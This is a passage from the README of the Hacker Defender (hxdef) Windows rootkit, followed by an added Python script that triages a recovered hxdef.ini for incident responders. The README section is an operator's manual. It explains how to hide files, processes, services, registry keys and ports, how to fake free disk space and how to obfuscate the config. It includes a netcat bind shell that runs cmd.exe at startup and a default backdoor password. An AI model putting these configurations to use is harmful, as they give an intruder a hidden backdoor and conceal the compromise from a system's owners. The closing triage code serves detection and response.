- only installs the service, but does not run it
- used to update the settings from the inifile
- doesn't install the service and runs normally
- removes hxdef from memory and kills all running backdoor connections; stopping the hxdef service now does the same
The ini file
Sections and special characters
The ini file is composed of the following sections:
- Hidden Table
- Root Processes
- Hidden Services
- Hidden RegKeys
- Hidden RegValues
- Startup Run
- Free Space
- Hidden Ports
- Settings
The following extra characters can be added to the ini file (under certain conditions) to obfuscate it:
[H<<<idden T>>a/"ble] >h"xdef"*
is the same as
[Hidden Table] hxdef*
Hidden Table
List of files, directories and processes which should be hidden. All files and directories in this list will disappear from file managers. Programs in this list will be hidden in the task list. Make sure the main file, the inifile, your backdoor file and the driver file are all in this list.
Root Processes
List of programs which will be immune to infection. Hidden files, directories and programs can be seen only from these root programs, so root processes are for rootkit admins. Being listed in Root Processes doesn't mean you're hidden: it is possible to have a root process which is not hidden, and vice versa.
Hidden Services
List of service and driver names which will be hidden in the database of installed services and drivers. The service name of the main rootkit program is HackerDefender100 by default; the driver name of the main rootkit driver is HackerDefenderDrv100. Both can be changed in the inifile.
Hidden RegKeys
List of registry keys which will be hidden. The rootkit has four keys in the registry. The first two, for the service and the driver, are the same as their names; the next two are LEGACY_NAME. For example, if you change your service name to BoomThisIsMySvc, its registry entry will be LEGACY_BOOMTHISISMYSVC. If you rename the service or the driver, you must also change this list.
Hidden RegValues
List of registry values which will be hidden.
Startup Run
List of programs which the rootkit runs after its startup. These programs have the same rights as the rootkit. The program name is separated from its arguments with a question mark (?). Do not use " characters. Programs will terminate at user logon; use the common, well-known methods for starting programs after user logon. You can use the following shortcuts here:
- %cmd% stands for the system shell executable with its path (e.g. C:\winnt\system32\cmd.exe)
- %cmddir% stands for the system shell executable directory (e.g. C:\winnt\system32\)
- %sysdir% stands for the system directory (e.g. C:\winnt\system32\)
- %windir% stands for the Windows directory (e.g. C:\winnt\)
- %tmpdir% stands for the temporary directory (e.g. C:\winnt\temp\)
c:\sys\nc.exe?-L -p 100 -t -e cmd.exe
A netcat shell is run after rootkit startup and listens on port 100.
%cmd%?/c echo Rootkit started at %TIME%>> %tmpdir%starttime.txt
This will append a time stamp to temporary_directory\starttime.txt (e.g. C:\winnt\temp\starttime.txt) every time the rootkit starts (%TIME% works only with Windows 2000 and higher).
Free Space
List of hard drives and the number of bytes you want to add to their free space. The list item format is X:NUM, where X is the drive letter and NUM is the number of bytes that will be added to its reported number of free bytes.
This will add about 123 MB to the free disk space shown for drive C.
Hidden Ports
List of open ports that you want to hide from applications like OpPorts, FPort, Active Ports, TCPView etc. It has at most 2 lines:
- First line format is TCP:tcpport1,tcpport2,tcpport3 ...
- Second line format is UDP:udpport1,udpport2,udpport3 ...
This will hide two ports: 8080/TCP and 456/TCP.
This will hide two ports: 8001/TCP and 12345/UDP.
This will hide five ports: 53/UDP, 54/UDP, 55/UDP, 56/UDP and 800/UDP.
Settings
Contains eight values:
- Password, a 16-character string used when working with the backdoor or redirector. The password can be shorter; the rest is filled with spaces.
- Name of the copy of the system shell which the backdoor creates in the temporary directory.
- Name of the shared memory where the settings for hooked processes are stored.
- Name of the rootkit service.
- Display name of the rootkit service.
- Description of the rootkit service.
- Name of the hxdef driver.
- Name of the hxdef driver file.
- Password=hxdef-rulez: your backdoor password is "hxdef-rulez"
- BackdoorShell=hxdefß$.exe: the backdoor will copy the system shell file (usually cmd.exe) to "hxdefß$.exe" in the temp directory
- FileMappingName=_.-=[Hacker Defender]=-._: the name of the shared memory will be "_.-=[Hacker Defender]=-._"
- ServiceName=HackerDefender100: the name of the service is "HackerDefender100"
- ServiceDisplayName=HXD Service 100: its display name is "HXD Service 100"
- ServiceDescription=powerful NT rootkit: its description is "powerful NT rootkit"
- DriverName=HackerDefenderDrv100: the name of the driver is "HackerDefenderDrv100"
- DriverFileName=hxdefdrv.sys: the driver will be stored in a file called "hxdefdrv.sys"
Default ini file
[Hidden Table]
hxdef*
rcmd.exe
[Root Processes]
hxdef*
rcmd.exe
[Hidden Services]
HackerDefender*
[Hidden RegKeys]
HackerDefender100
LEGACY_HACKERDEFENDER100
HackerDefenderDrv100
LEGACY_HACKERDEFENDERDRV100
[Hidden RegValues]
[Startup Run]
[Free Space]
[Hidden Ports]
[Settings]
Password=hxdef-rulez
BackdoorShell=hxdefß$.exe
FileMappingName=_.-=[Hacker Defender]=-._
ServiceName=HackerDefender100
ServiceDisplayName=HXD Service 100
ServiceDescription=powerful NT rootkit
DriverName=HackerDefenderDrv100
DriverFileName=hxdefdrv.sys
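As an added example that is not part of the hxdef README, the following Python helper lets a responder triage a recovered hxdef.ini: it strips the obfuscation characters shown in the README's own example, splits the file into its sections, and derives what to hunt for on the host (file patterns, the registry keys the rootkit creates, and the ports it hides), including registry keys that the [Settings] names imply but that the [Hidden RegKeys] list does not cover. The obfuscation character set, the rule for which sections it applies to, and the sample config are assumptions constructed for this example.

```python
import re

# Obfuscation characters from the README's own example ([H<<<idden T>>a/"ble] >h"xdef"*
# == [Hidden Table] hxdef*). The full set and "certain conditions" are not on the page;
# assumption: strip them from headers and list sections, keep [Startup Run]/[Settings] verbatim.
NOISE = re.compile(r'[<>/"]')

# Constructed sample: obfuscated header plus a Hidden RegKeys list not updated for the driver.
SAMPLE = """[H<<<idden T>>a/"ble]
>h"xdef"*
[Hidden RegKeys]
HackerDefender100
LEGACY_HACKERDEFENDER100
[Hidden Ports]
TCP:8080,456
UDP:12345
[Settings]
ServiceName=HackerDefender100
DriverName=HackerDefenderDrv100
"""

def parse_hxdef_ini(text):
    # Returns {section: [lines]} with the obfuscation characters removed where they apply.
    sections, current = {}, None
    for line in filter(None, map(str.strip, text.splitlines())):
        clean = NOISE.sub("", line)
        if clean.startswith("[") and clean.endswith("]"):
            current = clean[1:-1]
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line if current in ("Startup Run", "Settings") else clean)
    return sections

def hidden_ports(sections):
    # At most two lines: TCP:port,port,... and UDP:port,port,...
    ports = {}
    for line in sections.get("Hidden Ports", []):
        proto, _, nums = line.partition(":")
        ports[proto.upper()] = sorted(int(p) for p in nums.split(",") if p.strip().isdigit())
    return ports

def triage(text):
    # Indicators to hunt for, and registry keys the rootkit creates but does not hide.
    s = parse_hxdef_ini(text)
    cfg = dict(l.split("=", 1) for l in s.get("Settings", []) if "=" in l)
    svc, drv = cfg.get("ServiceName", ""), cfg.get("DriverName", "")
    expected = {svc, drv, "LEGACY_" + svc.upper(), "LEGACY_" + drv.upper()}
    return {"hide_patterns": s.get("Hidden Table", []),
            "regkeys_visible": sorted(expected - set(s.get("Hidden RegKeys", []))),
            "ports": hidden_ports(s)}
```

Keys listed under regkeys_visible are ones the rootkit will create under the service and driver names but will not hide, so they remain visible to normal registry tools on an infected host.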